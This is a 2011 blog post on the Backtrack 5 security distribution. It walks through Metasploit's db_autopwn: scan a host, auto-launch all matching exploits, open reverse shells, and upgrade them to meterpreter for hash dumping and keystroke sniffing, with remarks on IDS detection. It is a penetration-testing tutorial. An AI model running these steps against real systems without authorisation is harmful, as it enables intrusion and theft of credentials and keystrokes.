Monday, 23 May 2011

Backtrack 5 vs Backtrack 4



Everyones favourite security distribution has just been updated, with Backtrack 5 (codename Revolution) being released in the last few weeks.

As per usual backtrack is offered as an ISO and a VM, which is extremely handy for getting straight into play around with the new features without any setup requirements.

Backtrack 5 is based on Ubuntu 10.04 LTS and the Linux kernel 2.6.38, and metasploiters will be excited to know that metasploit 3.7.0 is packaged as part of the BT5.

db_Autopwn - if noise doesnt concern you...

What is very impressive is how easy it is to use db_autopwn to scan the network, automatically create a mysql database to export the scans results to, and then run possible exploits against hosts that are found. Remember of course db_autopwn is VERY loud, so you wouldn't want to use this sort of technique if you know your targets potentially have any IDS/IPS or network monitoring in place such as SNMP trapping.

For those interested it is as simple as a couple easy steps.

1. I like to work via the GNOME interface, so navigate to Metasploit Framework and open the msfconsole.










2. Type: db_driver mysql
This will set the nmap scan to log to MySQL




3. Type: nmap -v -O 10.101.224.185
This will scan the host and log the results to MySQL










4. Type: db_autopwn -p -e -b
This will analyze the host and automatically launch all possible exploits found against the host. If any of the exploits work you will gain a reverse_tcp shell bound to a random port. If you want to add -t to your arguements list you will get a long list of all the exploits available against the platform, in my case 8113.



5. Type: sessions -l
To find out if you have any available sessions to use or upgrade to the more advanced meterpreter shell.










6. Type: sessions -i <session id> (without the brackets)
This will bind to any active shells listed above.









You can also sessions -u <session id> to upgrade your shell to a meterpreter shell. Then the fun of hash dumps and sniffing the clients keystrokes can begins, but that's a blog for another day!


I love BT5 and hope to have more chances to use it in production in the future!
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)